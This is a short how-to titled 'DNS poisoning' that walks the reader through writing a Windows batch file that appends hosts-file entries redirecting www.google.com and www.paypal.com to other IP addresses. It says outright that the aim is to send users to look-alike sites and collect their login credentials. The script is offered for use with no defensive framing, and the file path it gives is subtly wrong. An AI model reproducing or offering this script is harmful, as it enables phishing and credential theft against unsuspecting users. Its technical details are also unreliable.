DNS poisoning

Batch file can has the tendency to modify the transfer zones by editing the hosts.txt file that
resides inside ‘C:\windows\system32\drivers\etc\hosts.txt’, so that it will take you to some malicious
websites instead of landing you to the legitimate website. This may also be used for phishing, i.e.
redirecting you to a bogus website which looks exactly like the legitimate one, and then steal credentials. 



1.
open the notepad
2.
type the following code

@echo off
echo 10.199.64.66 www.google.com >> C:\windows\system32\drivers\etc\hosts.txt
echo 10.199.64.67 www.paypal.com >> C:\windows\system32\drivers\etc\hosts.txt
exit
3.
save with 'anyname.bat'.

 what does this file do:-

This program creates a new entry in the hosts file, so that whenever an user attempts to move to
www.google.com, he will be re-directed to another host that has the IP address of 10.199.64.66, likewise
if the user attempts to login to the paypal account by typing in www.paypal.com, he will be re-directed to
another external bogus website that has the IP address of 10.199.64.67, where if the user enters the
credentials unknowingly, they were into the hackers database and he can use it for several other purposes.